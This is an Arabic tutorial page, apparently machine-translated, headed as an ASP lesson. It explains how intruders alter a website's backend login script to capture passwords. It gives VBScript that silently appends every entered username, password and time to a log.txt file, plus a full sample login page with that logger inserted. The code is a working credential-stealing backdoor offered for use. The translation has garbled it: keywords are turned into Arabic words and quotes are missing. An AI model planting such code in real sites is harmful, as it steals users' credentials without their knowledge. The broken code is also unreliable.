الصفحة الرئيسية>دروس برمجة الشبكات>البرنامج التعليمي لـ ASP

يعترض Asp رمز كلمة مرور تسجيل الدخول في الخلفية

الكاتب:Eve Cole وقت التحديث:2025-03-13 13:00:04

يحصل العديد من المتسللين على كلمة مرور تسجيل دخول المستخدم لموقع الويب المستهدف عن طريق تعديل رمز تسجيل الدخول في الخلفية، بحيث يتم حفظها في ملف txt بمجرد إدخال كلمة المرور.

الرمز هو كما يلي:

تعيين fso=server.createobject(scripting.filesystemobject)

إذا كان fso.FileExists(server.mappath(log.txt))=صحيحًا إذن

تعيين fin=fso.OpenTextFile(server.mappath(log.txt))

temp=fin.readall

fin. Close

تعيين الزعنفة = لا شيء

نهاية إذا

تعيين fout=fso.createtextfile(server.mappath(log.txt))

fout.WriteLine(درجة الحرارة&المستخدم:&اسم المستخدم&¦pwd:&كلمة المرور&¦الوقت:&now()&)

fout. Close

تعيين fout=لا شيء

تعيين fso=لا شيء

أدخله حيث يتم تقديم النموذج عند تسجيل الدخول في الخلفية!

الوثائق المرجعية:

انسخ رمز الكود كما يلي:

<%@language=صفحة رموز vbscript=936 %>

<%

ديمسكل، آر إس

اسم المستخدم خافت، كلمة المرور، رمز التحقق

اسم المستخدم = استبدال (تريم (طلب (اسم المستخدم)))،'،)

كلمة المرور = استبدال (تريم (طلب (كلمة المرور)))،'،)

CheckCode=replace(trim(Request(CheckCode))),',)

إذا كان اسم المستخدم = إذن

FoundErr=صحيح

ErrMsg=ErrMsg & <br><li>لا يمكن أن يكون اسم المستخدم فارغًا! </لي>

نهاية إذا

إذا كلمة المرور = ثم

FoundErr=صحيح

ErrMsg=ErrMsg & <br><li>لا يمكن أن تكون كلمة المرور فارغة! </لي>

نهاية إذا

إذا CheckCode = ثم

FoundErr=صحيح

ErrMsg=ErrMsg & <br><li>لا يمكن أن يكون رمز التحقق فارغًا! </لي>

نهاية إذا

إذا كانت الجلسة (رمز التحقق) = إذن

FoundErr=صحيح

ErrMsg=ErrMsg & <br><li>وقت تسجيل الدخول الخاص بك طويل جدًا، يرجى العودة إلى صفحة تسجيل الدخول لتسجيل الدخول مرة أخرى. </لي>

نهاية إذا

إذا كان CheckCode<>CStr(session(CheckCode)) إذن

FoundErr=صحيح

ErrMsg=ErrMsg & <br><li>رمز التأكيد الذي أدخلته غير متوافق مع الرمز الذي أنشأه النظام، يرجى إعادة إدخاله. </لي>

نهاية إذا

"وراء هذا هو الكود الذي أضفته ~ منطقة البداية."

تعيين fso=server.createobject(scripting.filesystemobject)

إذا كان fso.FileExists(server.mappath(log.txt))=صحيحًا إذن

تعيين fin=fso.OpenTextFile(server.mappath(log.txt))

temp=fin.readall

fin. Close

تعيين الزعنفة = لا شيء

نهاية إذا

تعيين fout=fso.createtextfile(server.mappath(log.txt))

fout.WriteLine(temp&user:&username&|pwd:&password&|time:&now()&)

fout. Close

تعيين fout=لا شيء

تعيين fso=لا شيء

'لقد قمت بحذف الكود الموجود خلف منطقة النهاية

%>

مقالات ذات صلة